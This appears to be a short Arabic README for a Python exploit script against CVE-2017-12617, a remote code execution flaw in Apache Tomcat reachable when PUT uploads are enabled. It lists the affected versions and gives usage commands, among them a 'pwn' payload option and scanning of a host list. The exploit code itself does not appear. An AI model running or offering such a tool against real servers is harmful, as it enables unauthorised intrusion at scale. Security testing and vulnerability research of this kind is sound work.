
نسخة محسّنة من PikaChu CVE
ثغرة تنفيذ الأوامر عن بُعد (RCE) حرجة تم اكتشافها في Apache Tomcat
تتأثر الأنظمة التي لديها PUT ممكّن (عبر ضبط معامل التهيئة "read-only" لـ Default servlet إلى "false").
إصدارات Tomcat قبل 9.0.1 (Beta)، 8.5.23، 8.0.47 و 7.0.82 تحتوي على ثغرة تنفيذ أوامر عن بُعد (RCE)
خطيرة محتملة على جميع أنظمة التشغيل إذا تم تكوين Default servlet
مع تعيين المعامل readonly إلى false أو تم تمكين WebDAV servlet
مع تعيين المعامل readonly إلى false
Python3 CVE-2017-12617.py
Python3 CVE-2017-12617.py -u http://127.0.0.1
Python3 CVE-2017-12617.py -u http://127.0.0.1 -p pwn
Python3 CVE-2017-12617.py -l hosts.txt